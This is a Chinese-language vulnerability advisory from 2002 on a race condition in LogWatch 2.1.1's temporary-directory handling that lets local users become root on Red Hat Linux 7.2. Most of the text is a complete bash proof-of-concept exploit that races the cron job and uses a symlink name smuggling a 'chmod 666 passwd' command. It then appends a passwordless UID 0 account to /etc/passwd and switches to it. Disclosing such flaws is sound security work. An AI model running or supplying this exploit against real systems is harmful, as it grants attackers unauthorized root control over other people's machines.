LogWatch存在竞争条件漏洞发布时间:2002-03-29 更新时间:2002-03-29 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 LogWatch 2.1.1详细描述 LogWatch是可定制化日志分析系统,可以解析你给定时间段中的系统日志和建立详细报告。 Red Hat Linux 7.2默认安装了LogWatch 2.1.1,其中在临时目录建立处理中存在竞争条件漏洞,可导致本地用户获得管理员权限。 测试代码 cat > logwatch211.sh <<EOF #!/bin/bash # # March 27 2002 # # logwatch211.sh # # Proof of concept exploit code # for LogWatch 2.1.1 # Waits for LogWatch to be run then gives root shell # For educational purposes only # # (c) Spybreak <spybreak@host.sk> SERVANT="00-logwatch" # Logwatch's cron entry SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/ echo echo "LogWatch 2.1.1 root shell exploit" echo '(c) Spybreak <spybreak@host.sk>' echo echo "Waiting for LogWatch to be executed" while :; do set `ps -o pid -C $SERVANT` if [ -n "$2" ]; then mkdir /tmp/logwatch.$2 ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron break; fi done echo "Waiting for LogWatch to finish it's work" while :; do set `ps -o pid -C $SERVANT` if [ -z "$2" ]; then ls -l /etc/passwd|mail root echo master::0:0:master:/root:/bin/bash >> /etc/passwd break; fi done su master EOF 解决方案 尚无 相关信息 Spybreak (spybreak@host.sk) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-03/0330.html |
